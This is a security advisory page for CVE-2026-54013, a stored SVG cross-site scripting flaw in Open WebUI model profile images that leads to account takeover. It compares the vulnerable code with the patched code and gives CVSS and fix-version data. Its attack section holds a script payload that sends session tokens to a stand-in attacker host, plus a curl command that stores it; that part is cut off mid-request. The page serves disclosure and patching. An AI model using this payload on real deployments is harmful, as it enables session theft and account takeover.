🛡️ CVE-2026-54013 — open-webui
Description
Open WebUI: Stored XSS to Account Takeover via Model Profile Images
# Stored XSS to Account Takeover via Model Profile Images in Open WebUI
Affected: Open WebUI <= 0.9.5
Bypass of: GHSA-3wgj-c2hg-vm6q, GHSA-3856-3vxq-m6fc
TL;DR
Open WebUI patched SVG XSS in user profile images and webhook profile images but forgot to apply the same fix to model profile images. The ModelMeta class has no validate_profile_image_url field validator, and the model image serving endpoint has no MIME allowlist or nosniff header. Any authenticated user with workspace.models permission (enabled by default) can store a data:image/svg+xml;base64,... payload in a model's profile image and achieve full account takeover of anyone who navigates to the image URL.
Past of the issue
In early 2025, two security advisories landed for Open WebUI:
- GHSA-3wgj-c2hg-vm6q SVG XSS via user profile images
- GHSA-3856-3vxq-m6fc SVG XSS via webhook profile images
The patches were clean. A validate_profile_image_url function was introduced in backend/open_webui/utils/validate.py a compiled regex that restricts data: URIs to safe raster formats (image/png, image/jpeg, image/gif, image/webp), explicitly excluding image/svg+xml because SVG can carry embedded <script> tags. On the output side, users.py added a MIME allowlist check and X-Content-Type-Options: nosniff.
The fix was applied to UserUpdateForm, UpdateProfileForm, and later to ChannelWebhookForm. Three models patched. Case closed.
Except there was a fourth endpoint.
The Gap
Open WebUI has a concept of "Models" user-created model configurations with metadata including a profile image. The metadata lives in ModelMeta:
```python
# backend/open_webui/models/models.py, line 37-47
class ModelMeta(BaseModel):
profile_image_url: Optional[str] = '/static/favicon.png'
description: Optional[str] = None
capabilities: Optional[dict] = None
model_config = ConfigDict(extra='allow')
```
No @field_validator. No import of validate_profile_image_url. ModelMeta accepts any string as profile_image_url including data:image/svg+xml;base64,....
The serving endpoint at GET /api/v1/models/model/profile/image has the same gap:
```python
# backend/open_webui/routers/models.py, line 503-518
elif profile_image_url.startswith('data:image'):
header, base64_data = profile_image_url.split(',', 1)
image_data = base64.b64decode(base64_data)
image_buffer = io.BytesIO(image_data)
media_type = header.split(';')[0].lstrip('data:')
headers = {'Content-Disposition': 'inline'}
# ...
return StreamingResponse(
image_buffer,
media_type=media_type,
headers=headers,
)
```
No MIME allowlist. No nosniff. No CSP. The SVG is served inline with Content-Type: image/svg+xml on the application's origin.
Compare this with the patched user endpoint:
```python
# backend/open_webui/routers/users.py, line 497-509
media_type = header.split(';')[0].lstrip('data:').lower()
if media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES: # <-- ABSENT in models.py
return FileResponse(f'{STATIC_DIR}/user.png')
return StreamingResponse(
image_buffer,
media_type=media_type,
headers={
'Content-Disposition': 'inline',
'X-Content-Type-Options': 'nosniff', # <-- ABSENT in models.py
},
)
```
The fix exists. It just was never applied here.
Comparison Table
| Endpoint | Input Validation | MIME Allowlist | nosniff | Status |
|----------|:---:|:---:|:---:|--------|
| GET /users/{id}/profile/image | YES | YES | YES | Patched |
| GET /webhooks/{id}/profile/image | YES | no | no | Partially patched |
| GET /models/model/profile/image | NO | NO | NO | Vulnerable |
Three Write Vectors
The malicious SVG data URI can be injected through any of three endpoints all pass ModelForm containing ModelMeta without validation:
1. POST /api/v1/models/create (line 195) any user with workspace.models permission
2. POST /api/v1/models/update (line 581) model owner or admin
3. POST /api/v1/models/import (line 279) admin only
The workspace.models permission is enabled by default for all non-pending users in a standard deployment.
The Attack
Step 1 Store the payload:
```bash
SVG=$(echo '<svg xmlns="http://www.w3.org/2000/svg">
<script>
new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")
</script>
</svg>' | base64 -w0)
curl -s -X POST 'https://TARGET/api/v1/models/create' \
-H "Authorization: Bearer $ATTACKER_TOKEN" \
-H 'Content-Type: application/json' \
-d "{
\"id\": \"gpt-4-turbo-preview\",
\"name\": \"GPT-4 Turbo\",
\"base_model_id\": \"gpt-4\",
\"meta\": {
\"profile_image_url\": \"data:image/svg+xml;base64,$SVG\",
\"description\": \"Latest GPT-4 Turbo model\"
},
\"params\": {},
\"access_grants\":
How this vulnerability can be exploited
This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. A user must be tricked into taking some action. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality high, integrity low, availability none.
Weakness class
CVE-2026-54013 is classified as CWE-116: Improper Encoding or Escaping of Output. Output is emitted without encoding it for the context it lands in, so data is interpreted as markup or code.
Affected software
CVE-2026-54013 is recorded against 1 package.
- open-webui (fixed in 0.9.6)
Timeline and source
Published on 17 June 2026 and last revised on 20 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. Record sourced from OSV.
References
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Advisory)
github.com (Package)
github.com (Web)
pypi.org (Web)
Details
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| open-webui | — | 0.9.6 |
References
Similar Threats
- Unknown CGA-48gw-49h8-c5px
- Unknown CGA-3j3w-43wh-4c9q
- Unknown CGA-2r69-w36g-jxvr
- Unknown CGA-27r7-6wp2-vv7p
- Unknown CGA-48q6-wgrm-m89m
More CVE 2026 advisories
Browse all of CVE 2026 in the advisory index.
Exploit Protection
Are you running open-webui?
CVE-2026-54013 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.
Check My Site For CVE-2026-54013 →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.